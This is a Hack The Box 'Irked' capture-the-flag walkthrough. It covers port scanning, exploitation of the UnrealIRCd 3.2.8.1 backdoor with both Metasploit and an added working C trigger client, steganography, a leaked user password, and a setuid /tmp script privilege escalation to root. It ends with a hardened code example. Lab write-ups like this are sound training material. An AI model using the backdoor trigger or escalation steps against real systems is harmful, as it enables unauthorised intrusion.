HTB Irked — Walkthrough

ENUMERATION
Start enumeration with a full-port, version-detecting nmap scan:
root@ArmourInfosec:~/ nmap -sV -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
52816/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 is open, so the web server is the first stop.

The page shows nothing but an image and the line "IRC is almost working", a hint that the interesting service is the IRC daemon.
The image itself also looked worth a closer look, so I downloaded it and tried the usual steganography tools. steghide prompts for a passphrase, and with an empty one it refuses to extract anything. That is consistent with a passphrase-protected payload, but only a lead: steghide prints the same error for a wrong passphrase and for an image with nothing embedded, so it proves nothing on its own.
root@ArmourInfosec:~/ steghide extract -sf irked.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Now for the IRC side. I used HexChat to connect: run hexchat from the terminal, click Add, fill in the IP and port, and connect. The server accepts the connection without any authentication.

One thing stands out: the server reports an outdated version, UnrealIRCd 3.2.8.1. That release is the one whose source tarball was trojaned in 2010 (CVE-2010-2075), and Metasploit has a module for it: exploit/unix/irc/unreal_ircd_3281_backdoor. I started msfconsole, selected that module, set the target host and port, and ran it.
The exploit returned a low-privileged shell running as the IRC daemon's user.
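The backdoor does not need Metasploit. In the trojaned 3.2.8.1 source, any line received on the IRC socket that starts with "AB;" is handed to system(), so the whole exploit is that prefix followed by a shell command. The client below is an added example, not code from this writeup or from the Metasploit module; it takes host, port and command from the caller (the scan shows UnrealIRCd on 6697, 8067 and 65534, and the writeup does not record which port it used), builds the trigger line and sends it. Nothing comes back over the connection: the command runs on the server as the ircd user, so a real payload would be something that calls back to you.

```c
/* Added example: manual trigger for the UnrealIRCd 3.2.8.1 backdoor.
 * Not part of the original writeup. Host, port and command are supplied
 * by the caller; which of the three UnrealIRCd ports on Irked carries the
 * backdoor is not recorded in the writeup, so it is left as an argument. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Build the line the backdoor executes: "AB;" + command + "\n".
 * The trojaned server passes the whole line to system(); "AB" fails as a
 * command and the shell then runs whatever follows the ';'.
 * Returns the number of bytes written, or -1 if buf is too small. */
int build_trigger(char *buf, size_t buflen, const char *cmd)
{
    int n = snprintf(buf, buflen, "AB;%s\n", cmd);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}

/* Connect to host:port, send the trigger line, return 0 on success.
 * The server sends no reply for this; the command simply runs there. */
int send_trigger(const char *host, const char *port, const char *cmd)
{
    char line[1024];
    int len = build_trigger(line, sizeof line, cmd);
    if (len < 0)
        return -1;

    struct addrinfo hints, *res, *rp;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0)
        return -1;

    int fd = -1;
    for (rp = res; rp != NULL; rp = rp->ai_next) {
        fd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
        if (fd < 0)
            continue;
        if (connect(fd, rp->ai_addr, rp->ai_addrlen) == 0)
            break;
        close(fd);
        fd = -1;
    }
    freeaddrinfo(res);
    if (fd < 0)
        return -1;

    ssize_t sent = send(fd, line, (size_t)len, 0);
    close(fd);
    return sent == (ssize_t)len ? 0 : -1;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s host port 'command'\n", argv[0]);
        return 2;
    }
    /* e.g. ./trigger 10.10.10.117 <port> '<reverse shell command>' */
    return send_trigger(argv[1], argv[2], argv[3]) == 0 ? 0 : 1;
}
```

Because the command runs through system(), anything the ircd user's shell can execute works as the payload; a connect-back shell to your own listener is the usual choice.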
From that shell, go to /home/djmardov/Documents. It holds two files: user.txt and a hidden file, .backup.
user.txt is not readable from this account, but .backup is:
cat .backup
UPupDOWNdownLRlrBAbaSSss
That string is the steghide passphrase for irked.jpg: run steghide extract -sf irked.jpg again, enter it, and steghide writes pass.txt. That file holds djmardov's password, so we can log in over SSH with it:
djmardov:Kab6h+m+bbp2J:HG
ssh djmardov@10.10.10.117

With the SSH session, read user.txt and move on to privilege escalation.
First, look for binaries with the SUID or SGID bit set. The original search put -perm -g=s on one side of -o and the -exec on the other, so SGID files were matched but never printed; the version below groups the two permission tests and puts -maxdepth first, where find expects it:
find / -maxdepth 6 \( -perm -4000 -o -perm -2000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

This turns up /usr/bin/viewuser. Running it shows that it executes sh -c /tmp/listusers, i.e. it hands a path under the world-writable /tmp to a shell (the sh -c form is what system() does). Since the binary is setuid root and we control /tmp/listusers, put a command in that file, make it executable and run viewuser:
echo "su root" > /tmp/listusers && chmod 777 /tmp/listusers && /usr/bin/viewuser
viewuser runs the script with root privileges, so su does not prompt for a password and drops you into a root shell. chmod +x would be enough; 777 is simply what was used here.

What really happened???
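As an added example illustrating the escalation above, here is a minimal reconstruction of the pattern and a hardened version. This is not the writeup's own code and not the real viewuser source: the shape (a setuid-root binary that calls setuid(0) and then system() on a script in /tmp) is assumed from the behaviour described above, and the /usr/local/libexec path in the hardened version is a placeholder.

```c
/* Added example, not from the writeup and not the real /usr/bin/viewuser.
 * Reconstructs the setuid-root pattern described above and a safer form.
 * The HELPER path is an assumed location, not one that exists on the box. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable shape: effective uid is root (binary is SUID), the script
 * path sits under world-writable /tmp, and system() hands it to "sh -c".
 * Whoever can write /tmp/listusers chooses what root executes. */
int vulnerable_viewuser(void)
{
    if (setuid(0) != 0)
        return -1;
    return system("/tmp/listusers");    /* attacker-controlled file */
}

/* Refuse to run a helper unless it is a regular file owned by root and
 * writable by nobody else. lstat() so a symlink pointing into /tmp is
 * rejected as well. Returns 1 if trustworthy, 0 otherwise. */
int script_is_trustworthy(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return 0;                       /* missing or unreadable */
    if (!S_ISREG(st.st_mode))
        return 0;                       /* directory, symlink, device... */
    if (st.st_uid != 0)
        return 0;                       /* not root-owned */
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;                       /* group- or world-writable */
    return 1;
}

#define HELPER "/usr/local/libexec/listusers"   /* assumed, root-only dir */

/* Hardened shape: fixed path in a root-only directory, ownership and
 * permission check, and execve() with a fixed argv and a minimal
 * environment instead of system(), so no shell parses anything and no
 * inherited PATH or IFS can change what runs. Only returns on failure. */
int hardened_viewuser(void)
{
    if (!script_is_trustworthy(HELPER)) {
        fprintf(stderr, "refusing to run %s: bad owner or permissions\n", HELPER);
        return 1;
    }
    char *const argv[] = { HELPER, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    execve(HELPER, argv, envp);
    perror("execve");
    return 1;
}

int main(void)
{
    /* Show the check against the path the walkthrough abuses. */
    printf("/tmp/listusers trustworthy: %d\n",
           script_is_trustworthy("/tmp/listusers"));
    return 0;
}
```

The check is not a substitute for the real fix, which is to keep root-executed helpers out of user-writable directories in the first place; it simply makes the binary refuse to run a file an unprivileged user could have replaced.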

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Thank you for reading!